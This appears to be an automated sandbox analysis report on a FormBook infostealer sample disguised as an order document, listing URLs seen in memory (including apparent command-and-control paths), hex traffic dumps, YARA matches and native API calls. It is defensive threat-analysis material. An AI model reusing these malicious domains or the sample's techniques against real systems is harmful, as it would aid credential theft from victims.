20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:51 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1727X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6

Source: compact.exe, 0000000C.00000002.4563338371.0000000005138000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000004028000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXe
Source: compact.exe, 0000000C.00000002.4563338371.0000000004AF0000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.00000000039E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD
Source: compact.exe, 0000000C.00000002.4563338371.000000000463A000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.000000000352A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4Y
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002A27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
Source: compact.exe, 0000000C.00000002.4563338371.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003D04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://superunicornpalace.com/mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP35
Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hondamechanic.today
Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hondamechanic.today/pv57/
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe
Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc
Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengistiebethlehem.com/display.cfm
Source: compact.exe, 0000000C.00000002.4563338371.00000000044A8000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003398000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://yg08.gowi0i.xyz
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdn.consentmanager.net
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://delivery.consentmanager.net
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 0000000C.00000003.2706758927.0000000008283000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I81
Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://support.hostgator.com/
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000000F.00000002.2818794642.0000000026FA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKK
Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net
Source: OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: spec 4008670601 AZTEK Order.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_0042B683 NtClose,	6_2_0042B683
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2B60 NtClose,LdrInitializeThunk,	6_2_017E2B60
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_017E2DF0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_017E2C70
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E35C0 NtCreateMutant,LdrInitializeThunk,	6_2_017E35C0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E4340 NtSetContextThread,	6_2_017E4340
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E4650 NtSuspendThread,	6_2_017E4650
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2BF0 NtAllocateVirtualMemory,	6_2_017E2BF0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2BE0 NtQueryValueKey,	6_2_017E2BE0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2BA0 NtEnumerateValueKey,	6_2_017E2BA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2B80 NtQueryInformationFile,	6_2_017E2B80
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2AF0 NtWriteFile,	6_2_017E2AF0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2AD0 NtReadFile,	6_2_017E2AD0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2AB0 NtWaitForSingleObject,	6_2_017E2AB0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2D30 NtUnmapViewOfSection,	6_2_017E2D30
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2D10 NtMapViewOfSection,	6_2_017E2D10
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2D00 NtSetInformationFile,	6_2_017E2D00
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2DD0 NtDelayExecution,	6_2_017E2DD0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2DB0 NtEnumerateKey,	6_2_017E2DB0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2C60 NtCreateKey,	6_2_017E2C60
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2C00 NtQueryInformationProcess,	6_2_017E2C00
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2CF0 NtOpenProcess,	6_2_017E2CF0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2CC0 NtQueryVirtualMemory,	6_2_017E2CC0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2CA0 NtQueryInformationToken,	6_2_017E2CA0
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: 6_2_017E2F60 NtCreateProcessEx,	6_2_017E2F60
